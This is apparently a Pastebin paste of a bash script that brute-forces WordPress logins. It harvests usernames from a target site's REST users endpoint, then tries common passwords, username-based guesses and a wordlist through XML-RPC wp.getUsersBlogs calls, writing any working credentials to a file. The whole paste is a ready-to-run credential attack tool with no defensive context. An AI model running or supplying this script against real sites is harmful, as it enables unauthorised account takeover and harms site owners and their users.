Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # WORDPRESS XMLRPC BRUTEFORCE
- # save password list with name > wordlist.txt
- function _brute() {
- TARGET="${1}";
- JSONUSER=$(curl -s "${TARGET}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
- if [[ ! -z ${JSONUSER} ]];then
- echo "INFO: ${TARGET} username found!"
- for USER in ${JSONUSER};
- do
- PASS=( '123456' '12345678' 'admin' 'qwerty' 'qwerty123' ''"${USER}"'' ''"${USER}123"'' ''"$(cat wordlist.txt | tr '\r\n' ' ')"'' );
- for PWD in "${PASS[@]}";
- do
- BRUTE=$(timeout 3 curl -s -X POST -d '<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>'$USER'</value></param><param><value>'$PWD'</value></param></params></methodCall>' ${TARGET}/xmlrpc.php);
- if [[ ${BRUTE} =~ "blogName" ]];then
- echo " FOUND!: ${TARGET} ${USER}:${PWD} saved to WORDPRESS-LOGIN.TXT";
- echo "${TARGET} ${USER}:${PWD}" >> WORDPRESS-LOGIN.TXT
- return 0;
- else
- echo " FAILED: ${TARGET} ${USER}:${PWD}";
- fi
- done
- done
- else
- echo "ERROR: ${TARGET} can grab username";
- fi
- }
- _brute ${1}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement